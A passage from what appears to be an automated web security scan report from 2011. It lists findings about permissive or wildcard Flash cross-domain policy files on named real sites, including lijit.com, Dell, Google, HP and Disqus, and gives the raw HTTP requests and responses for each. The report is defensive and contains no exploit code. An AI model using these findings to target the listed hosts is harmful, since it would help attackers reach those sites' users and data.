Host: vap2den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:28:06 GMT
ETag: "e0619-83-4aacf206fe980"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.39. http://vap2iad1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap2iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:04 GMT
ETag: "a559f-83-4aad041ff1c00"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.40. http://vap3den1.lijit.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap3den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 22:29:05 GMT
ETag: "122831-83-4aacf23f74ab7"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.41. http://www.cymphonix.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cymphonix.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 06 Jan 2009 07:09:52 GMT
ETag: "30d8758-69-17f87000"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.42. http://www.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:46:32 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.43. http://accessories.us.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: accessories.us.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 28 May 2009 18:43:47 GMT
Accept-Ranges: bytes
ETag: "2747823cc4dfc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
Content-Length: 364

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.triaddigital.com" />
...[SNIP]...

4.44. https://adwords.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 16:28:57 GMT
Date: Sun, 04 Sep 2011 16:28:57 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.45. http://blogs.skype.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:34 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Wed, 21 Apr 2010 18:34:22 GMT
ETag: "42ce4b-173-484c371592780"
Accept-Ranges: bytes
Content-Length: 371
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" />
<allow-access-from domain="*.skype.net" />
<allow-access-from domain="*.skype.test"/>
...[SNIP]...

4.46. http://content-cdn.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
ETag: "2d593b04245cb1:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:08 GMT
Content-Length: 270
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.47. http://content.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
Accept-Ranges: bytes
ETag: "2d593b04245cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Connection: close
Content-Length: 270

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.48. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:38 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.49. http://embed.technorati.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://embed.technorati.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: embed.technorati.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 05:29:04 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 01:09:39 GMT
ETag: "1d5c40-14f-4770890c33ac0"
Accept-Ranges: bytes
Content-Length: 335
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.technorati.com" />
<allow-access-from domain="technorati.whsites.net" />
<allow-access-from domain="convoad.technoratimedia.com" />
...[SNIP]...

4.50. http://h30415.www3.hp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30415.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30415.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Last-Modified: Sat, 17 May 2008 20:24:00 GMT
ETag: "556e68-469-44d72e9257800"
Accept-Ranges: bytes
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="feedroom.speedera.net" />
<allow-access-from domain="qa.www.feedroom.com" />
<allow-access-from domain="*.feedroom.com" />
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="downloads.feedroom.com" />
   <allow-access-from domain="*.downloads.feedroom.com" />
   <allow-access-from domain="*.lw-player.feedroom.com" />
   <allow-access-from domain="*.canoe.com" />
   <allow-access-from domain="*.canoe.com.edgesuite.net" />
   <allow-access-from domain="*.usatoday.com" />
   <allow-access-from domain="*.nymag.com" />
   <allow-access-from domain="*.canoe.ca" />
   <allow-access-from domain="*.hsus.org" />
<allow-access-from domain="*.temel.com"/>
<allow-access-from domain="*.curiousmedia.com"/>
<allow-access-from domain="*.odopod.com"/>
...[SNIP]...

4.51. http://h30507.www3.hp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30507.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30507.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 31 Aug 2011 09:01:47 GMT
ETag: "1821c2d-1d0-4abc960c2d4c0"
Accept-Ranges: bytes
Content-Length: 464
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="h41112.www4.hp.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...

4.52. http://h41131.www4.hp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h41131.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41131.www4.hp.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "1079908203"
Last-Modified: Wed, 21 Oct 2009 08:26:38 GMT
Server: lighttpd
Content-Length: 642
Date: Sun, 04 Sep 2011 16:32:35 GMT
X-Varnish: 766108063
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.hp.com" />
   <allow-access-from domain="*.21torr.com" />
   <allow-access-from domain="*.google.*" />
   <allow-access-from domain="*.gmodules.*" />
   <allow-access-from domain="*.seitenschwung.de" />
<allow-access-from domain="*.seitenschwung.de/21T" />
...[SNIP]...

4.53. http://i.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 19:18:24 GMT
ETag: "040eb3d213cb1:0"
Date: Sun, 04 Sep 2011 16:19:15 GMT
Content-Length: 1152
Connection: close
Cache-Control: public, max-age=604800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.twitter.com" />
<allow-access-from domain="*.radian6.com" />
<allow-access-from domain="*.ideastorm.com" />
<allow-access-from domain="*.flickr.com" />
...[SNIP]...

4.54. http://lt.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lt.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: lt.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 942
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 21:01:46 GMT
Accept-Ranges: bytes
ETag: "bf15fe94ddb0ca1:ed9"
X-Powered-By: ASP.NET
Server: Unauthorized-Use-Prohibited
Date: Sun, 04 Sep 2011 16:18:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...

4.55. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request